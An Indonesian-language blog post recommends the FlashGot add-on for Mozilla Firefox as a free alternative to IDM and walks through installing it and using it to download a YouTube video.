tapi sekarang kalian bisa bernafas legah dengan adanya postingan ini, saya akan memberikan trik download yang aman, nyaman, bebas, gratis, dan ORIGINAL.

apakah kalian tau Add Ons dari mozilla? yah, add ons adalah  applikasi web yang hampir menyerupai software tetapi tidak berdiri sendiri, add ons adalah komponen dari browser mozilla firefox yang bertujuan untuk menunjang kegiatan browsing yang di lakukan USER pada browser mozilla firefox.

hal itu memang terbukti, karena kita bisa lihat, sekarang. browser mozilla firefox adalah browser no 1 di dunia, dan hampir semua PC di dunia menggunakannya.
sekarang dalam mozilla firefox terdapat add ons yang menarik dan sangat membantu dalam kegiatan downloading kalian. nama Add Ons nya adalah FlashGot. add ons ini sangat menarik, karna segala macam file bisa di download dengan add ons ini, add ons ini bersifat hampir sama dengan IDM. tetapi add ons ini memiliki keunggulan dari pada IDM. keunggulannya adalah :

1. Free (gratis)
2. Original Untuk Mozilla Firefox
3. mudah penggunaannya
4. ringan dan cepat

nah tata cara dari cara mendapatkannya dan menggunakannya akan saya bahas di bawah.  check this out


langkah-langkah mendapatkan dan menggunakan add ons Flash Got :

1. download add ons nya
disini
2. klik Add to firefox.
3. tunggu proses downloadnya hingga selesai.

4. setelah download selesai, tunggu 5 detik lalu  klik instal.
5. tunggu hingga selesai , lalu restart firefox anda untuk membuat add onsnya berfungsi.
6. setelah itu coba anda membuka situs video seperti http://www.youtube.com/ atau MP3 seperti http://www.jango.com/
7. saya akan mencontohkan mendownload melalui youtube. silahkan pilih video yang akan di play.
8. setelah anda memilih videonya, pada toolbar firefox akan keluar ICON download dari flash got seperti pada gambar berikut.

9. klik icon tersebut lalu akan muncul jendela direktory 

10. pilih direktorynya lalu klik OK dan OK lagi

11. silahkan tunggu proses download hingga selesai.


SEMOGA ARTIKEL INI BERMANFAAT. AAMIIN


apabila ada yang mau Copas jangan lupa di cantumin sumbernya yaaaa

Search